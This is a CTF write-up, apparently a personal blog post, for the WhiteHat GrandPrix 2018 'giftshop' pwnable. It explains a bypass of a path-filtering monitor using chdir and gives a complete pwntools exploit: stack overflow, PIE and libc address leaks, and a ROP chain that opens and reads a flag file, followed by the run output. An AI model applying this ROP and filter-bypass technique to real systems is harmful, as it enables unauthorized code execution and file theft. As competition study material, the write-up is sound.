CTF/2018
WhiteHat GrandPrix 2018 QUAL - pwn01 (giftshop)
pwn3r_45
2018. 8. 19. 15:10
Category : pwnable
nc pwn01.grandprix.whitehatvn.com 26129 file: material.grandprix.whitehatvn.com/pwn01 |
forPlayer.zip
Summary : stack bof, bypass system call && filename filtering
* bypass flag filename filtering (/home/gift/flag.txt)
- default
[original]
monitor : /home/gift/
target : /home/gift/
[open('./aa/../flag.txt')]
monitor : real_path(/home/gift/./aa/../flag.txt) = /home/gift/flag.txt ( filtered!!! )
target : real_path(/home/gift/./aa/../flag.txt) = /home/gift/flag.txt
- after chdir('/home/')
[chdir('/home/')]
monitor : /home/gift/
target : /home/
[open('gift/flag.txt')]
monitor : /home/gift/gift/flag.txt ( not filtered )
target : /home/gift/flag.txt
exploit.py
#!/usr/bin/python
from pwn import *
#s = process('./giftshop')
s = remote('pwn01.grandprix.whitehatvn.com', 26129)
s.recvuntil('you come here !\n')
pie_base = int(s.recvline().strip(),16) - 0x2030D8
print hex(pie_base)
puts_plt = pie_base + 0xB40
puts_got = pie_base + 0x203038
pop_rdi = pie_base + 0x000000000000225f
pop_rsi = pie_base + 0x0000000000002261
pop_rdx = pie_base + 0x0000000000002265
#0x000000000000225f : pop rdi ; ret
#0x0000000000002265 : pop rdx ; ret
#0x0000000000002261 : pop rsi ; ret
main_addr = pie_base + 0x00DA0
freespace = pie_base + 0x203200
s.recvuntil('plzz ??\n')
s.sendline('12345')
s.recvuntil('plzz: \n')
s.sendline('12345')
s.recvuntil('Your choice:\n')
pay = ''
pay += '1\x00'
pay = pay.ljust(24, 'a')
pay += p64(pop_rdi)
pay += p64(puts_got)
pay += p64(puts_plt)
pay += p64(main_addr)
s.sendline(pay)
#libc leak
libc_base = u64(s.recvline().strip().ljust(8, '\x00')) - 0x6f690
print hex(libc_base)
libc_open = libc_base + 0xf7030
libc_read = libc_base + 0xf7250
libc_chdir = libc_base + 0xf7a90
fake_dir = pie_base + 0x203120 + 8
filename = pie_base + 0x203120 + 8 + 8
'''
gdb-peda$ p open
$1 = {<text variable, no debug info>} 0xf7030 <open64>
gdb-peda$ p read
$2 = {<text variable, no debug info>} 0xf7250 <read>
'''
#2nd chance
s.recvuntil('you come here !\n')
s.recvline()
s.recvuntil('plzz ??\n')
s.sendline('12345')
s.recvuntil('plzz: \n')
s.sendline('1234567\x00/home/\x00\x00./gift/flag.txt\x00')
# /home : fake_dir
# ./gift/flag.txt : filename
s.recvuntil('Your choice:\n')
pay = ''
pay += '1\x00'
pay = pay.ljust(24, 'a')
pay += p64(pop_rdi)
pay += p64(fake_dir)
pay += p64(libc_chdir)
pay += p64(pop_rdi)
pay += p64(filename)
pay += p64(pop_rsi)
pay += p64(0)
pay += p64(libc_open)
pay += p64(pop_rdi)
pay += p64(4)
pay += p64(pop_rsi)
pay += p64(freespace)
pay += p64(pop_rdx)
pay += p64(100)
pay += p64(libc_read)
pay += p64(pop_rdi)
pay += p64(freespace)
pay += p64(puts_plt)
s.sendline(pay)
s.interactive()
$ python exploit.py
[+] Opening connection to pwn01.grandprix.whitehatvn.com on port 26129: Done
0x557bb602b000
0x7f6d1e22e000
[*] Switching to interactive mode
WhiteHat{??????????????????????????????????}